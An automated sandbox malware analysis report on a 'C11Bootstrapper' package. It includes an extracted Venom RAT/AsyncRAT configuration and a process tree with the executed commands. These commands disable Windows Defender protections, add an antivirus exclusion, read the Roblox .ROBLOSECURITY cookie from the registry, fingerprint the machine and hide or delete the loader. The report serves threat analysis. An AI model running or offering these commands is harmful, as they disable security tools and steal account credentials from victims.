Overview
overview
10Static
static
10C11Bootstr...up.exe
windows7-x64
10C11Bootstr...up.exe
windows10-2004-x64
10C11Bootstr...er.exe
windows7-x64
10C11Bootstr...er.exe
windows10-2004-x64
10C11Bootstr...on.bat
windows7-x64
10C11Bootstr...on.bat
windows10-2004-x64
10C11Bootstr...or.exe
windows7-x64
10C11Bootstr...or.exe
windows10-2004-x64
10C11Bootstr...ox.vbs
windows7-x64
1C11Bootstr...ox.vbs
windows10-2004-x64
1C11Bootstr...rt.bat
windows7-x64
1C11Bootstr...rt.bat
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
19-04-2024 20:56
Behavioral task
behavioral1
Sample
C11Bootstrapper/Properties/C11Setup.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
C11Bootstrapper/Properties/C11Setup.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
C11Bootstrapper/Properties/GuiLoader.exe
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
C11Bootstrapper/Properties/GuiLoader.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral5
Sample
C11Bootstrapper/Properties/IndependenciesInstallation.bat
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
C11Bootstrapper/Properties/IndependenciesInstallation.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
C11Bootstrapper/Properties/PageEditor.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
C11Bootstrapper/Properties/PageEditor.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral9
Sample
C11Bootstrapper/Properties/msgbox.vbs
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
C11Bootstrapper/Properties/msgbox.vbs
Resource
win10v2004-20240412-en
Behavioral task
behavioral11
Sample
C11Bootstrapper/Start.bat
Resource
win7-20231129-en
General
-
Target
C11Bootstrapper/Start.bat
-
Size
1KB
-
MD5
4e3179e79f11708b60c3af67718cc0ae
-
SHA1
e22536c444427ce73dcc50091c28477c44e23210
-
SHA256
6953af9e22a172b023757199cc77c0ea2353bfe7ab1843516a161081f0c1d76d
-
SHA512
aaf2402399fe8887fe516a3be50054129298970dc322652dc02578a523be74135e02b6856f0b7b774df3c827b131d54828143583038bc5350c40e89dcd1409e1
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
127.0.0.1:4449
tazbtpfpfzpxti
-
delay
1
-
install
true
-
install_file
PageEditor.exe
-
install_folder
%Temp%
-
pastebin_config
https://pastebin.com/raw/xZqBe1fC
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral12/memory/5104-0-0x0000020DFF3A0000-0x0000020DFF3E4000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts GuiLoader.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 75 discord.com 76 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 4 IoCs
pid Process 4976 timeout.exe 4204 timeout.exe 4512 timeout.exe 3672 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4324 wmic.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1356 PING.EXE -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 5104 GuiLoader.exe 5104 GuiLoader.exe 4208 powershell.exe 4208 powershell.exe 4208 powershell.exe 952 powershell.exe 952 powershell.exe 952 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 348 powershell.exe 348 powershell.exe 348 powershell.exe 3484 powershell.exe 3484 powershell.exe 3484 powershell.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe 368 C11Setup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3868 PageEditor.exe Token: SeDebugPrivilege 368 C11Setup.exe Token: SeDebugPrivilege 5104 GuiLoader.exe Token: SeIncreaseQuotaPrivilege 2844 wmic.exe Token: SeSecurityPrivilege 2844 wmic.exe Token: SeTakeOwnershipPrivilege 2844 wmic.exe Token: SeLoadDriverPrivilege 2844 wmic.exe Token: SeSystemProfilePrivilege 2844 wmic.exe Token: SeSystemtimePrivilege 2844 wmic.exe Token: SeProfSingleProcessPrivilege 2844 wmic.exe Token: SeIncBasePriorityPrivilege 2844 wmic.exe Token: SeCreatePagefilePrivilege 2844 wmic.exe Token: SeBackupPrivilege 2844 wmic.exe Token: SeRestorePrivilege 2844 wmic.exe Token: SeShutdownPrivilege 2844 wmic.exe Token: SeDebugPrivilege 2844 wmic.exe Token: SeSystemEnvironmentPrivilege 2844 wmic.exe Token: SeRemoteShutdownPrivilege 2844 wmic.exe Token: SeUndockPrivilege 2844 wmic.exe Token: SeManageVolumePrivilege 2844 wmic.exe Token: 33 2844 wmic.exe Token: 34 2844 wmic.exe Token: 35 2844 wmic.exe Token: 36 2844 wmic.exe Token: SeIncreaseQuotaPrivilege 2844 wmic.exe Token: SeSecurityPrivilege 2844 wmic.exe Token: SeTakeOwnershipPrivilege 2844 wmic.exe Token: SeLoadDriverPrivilege 2844 wmic.exe Token: SeSystemProfilePrivilege 2844 wmic.exe Token: SeSystemtimePrivilege 2844 wmic.exe Token: SeProfSingleProcessPrivilege 2844 wmic.exe Token: SeIncBasePriorityPrivilege 2844 wmic.exe Token: SeCreatePagefilePrivilege 2844 wmic.exe Token: SeBackupPrivilege 2844 wmic.exe Token: SeRestorePrivilege 2844 wmic.exe Token: SeShutdownPrivilege 2844 wmic.exe Token: SeDebugPrivilege 2844 wmic.exe Token: SeSystemEnvironmentPrivilege 2844 wmic.exe Token: SeRemoteShutdownPrivilege 2844 wmic.exe Token: SeUndockPrivilege 2844 wmic.exe Token: SeManageVolumePrivilege 2844 wmic.exe Token: 33 2844 wmic.exe Token: 34 2844 wmic.exe Token: 35 2844 wmic.exe Token: 36 2844 wmic.exe Token: SeIncreaseQuotaPrivilege 3868 PageEditor.exe Token: SeSecurityPrivilege 3868 PageEditor.exe Token: SeTakeOwnershipPrivilege 3868 PageEditor.exe Token: SeLoadDriverPrivilege 3868 PageEditor.exe Token: SeSystemProfilePrivilege 3868 PageEditor.exe Token: SeSystemtimePrivilege 3868 PageEditor.exe Token: SeProfSingleProcessPrivilege 3868 PageEditor.exe Token: SeIncBasePriorityPrivilege 3868 PageEditor.exe Token: SeCreatePagefilePrivilege 3868 PageEditor.exe Token: SeBackupPrivilege 3868 PageEditor.exe Token: SeRestorePrivilege 3868 PageEditor.exe Token: SeShutdownPrivilege 3868 PageEditor.exe Token: SeDebugPrivilege 3868 PageEditor.exe Token: SeSystemEnvironmentPrivilege 3868 PageEditor.exe Token: SeRemoteShutdownPrivilege 3868 PageEditor.exe Token: SeUndockPrivilege 3868 PageEditor.exe Token: SeManageVolumePrivilege 3868 PageEditor.exe Token: 33 3868 PageEditor.exe Token: 34 3868 PageEditor.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 368 C11Setup.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 3796 wrote to memory of 932 3796 cmd.exe 100 PID 3796 wrote to memory of 932 3796 cmd.exe 100 PID 932 wrote to memory of 4976 932 cmd.exe 102 PID 932 wrote to memory of 4976 932 cmd.exe 102 PID 932 wrote to memory of 4204 932 cmd.exe 103 PID 932 wrote to memory of 4204 932 cmd.exe 103 PID 932 wrote to memory of 4512 932 cmd.exe 104 PID 932 wrote to memory of 4512 932 cmd.exe 104 PID 932 wrote to memory of 4304 932 cmd.exe 106 PID 932 wrote to memory of 4304 932 cmd.exe 106 PID 932 wrote to memory of 3672 932 cmd.exe 107 PID 932 wrote to memory of 3672 932 cmd.exe 107 PID 932 wrote to memory of 368 932 cmd.exe 108 PID 932 wrote to memory of 368 932 cmd.exe 108 PID 932 wrote to memory of 5104 932 cmd.exe 109 PID 932 wrote to memory of 5104 932 cmd.exe 109 PID 932 wrote to memory of 3868 932 cmd.exe 110 PID 932 wrote to memory of 3868 932 cmd.exe 110 PID 5104 wrote to memory of 2844 5104 GuiLoader.exe 111 PID 5104 wrote to memory of 2844 5104 GuiLoader.exe 111 PID 5104 wrote to memory of 4196 5104 GuiLoader.exe 116 PID 5104 wrote to memory of 4196 5104 GuiLoader.exe 116 PID 5104 wrote to memory of 4208 5104 GuiLoader.exe 118 PID 5104 wrote to memory of 4208 5104 GuiLoader.exe 118 PID 5104 wrote to memory of 952 5104 GuiLoader.exe 120 PID 5104 wrote to memory of 952 5104 GuiLoader.exe 120 PID 5104 wrote to memory of 2104 5104 GuiLoader.exe 122 PID 5104 wrote to memory of 2104 5104 GuiLoader.exe 122 PID 5104 wrote to memory of 348 5104 GuiLoader.exe 125 PID 5104 wrote to memory of 348 5104 GuiLoader.exe 125 PID 5104 wrote to memory of 2588 5104 GuiLoader.exe 127 PID 5104 wrote to memory of 2588 5104 GuiLoader.exe 127 PID 5104 wrote to memory of 2300 5104 GuiLoader.exe 129 PID 5104 wrote to memory of 2300 5104 GuiLoader.exe 129 PID 5104 wrote to memory of 2220 5104 GuiLoader.exe 131 PID 5104 wrote to memory of 2220 5104 GuiLoader.exe 131 PID 5104 wrote to memory of 3484 5104 GuiLoader.exe 133 PID 5104 wrote to memory of 3484 5104 GuiLoader.exe 133 PID 5104 wrote to memory of 4324 5104 GuiLoader.exe 135 PID 5104 wrote to memory of 4324 5104 GuiLoader.exe 135 PID 5104 wrote to memory of 2576 5104 GuiLoader.exe 137 PID 5104 wrote to memory of 2576 5104 GuiLoader.exe 137 PID 2576 wrote to memory of 1356 2576 cmd.exe 139 PID 2576 wrote to memory of 1356 2576 cmd.exe 139 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4196 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Start.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K IndependenciesInstallation.bat2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:4976
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:4204
-
-
C:\Windows\system32\timeout.exetimeout /t 33⤵
- Delays execution with timeout.exe
PID:4512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\msgbox.vbs"3⤵PID:4304
-
-
C:\Windows\system32\timeout.exetimeout /t 43⤵
- Delays execution with timeout.exe
PID:3672
-
-
C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\C11Setup.exeC11Setup.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:368
-
-
C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exeGuiLoader.exe3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exe"4⤵
- Views/modifies file attributes
PID:4196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
PID:952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:348
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵PID:2588
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2300
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:4324
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exe" && pause4⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:1356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\PageEditor.exePageEditor.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD543475d20ed96d7c6627d7f7f5726a901
SHA12e1704dc14bcfe8bc0311e26cb48c3fb884407c4
SHA256299720508b495a169d1cd56c6ab6d75a829c6b2edfd4a7816b4f581c0c8eae9a
SHA512d9a05e8e473fc9bfb56b882d09772c99518675a7c99769f95df2466ae11ed3b62d01cb70e07db9bc51961c14fdc778efad3393213c0f08dff7bed9ea5b44623f
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
948B
MD574a6b79d36b4aae8b027a218bc6e1af7
SHA10350e46c1df6934903c4820a00b0bc4721779e5f
SHA25660c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04
SHA51260e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0
-
Filesize
1KB
MD5227556da5e65f6819f477756808c17e4
SHA16ffce766e881ca2a60180bb25f4981b183f78279
SHA256101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
SHA512d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b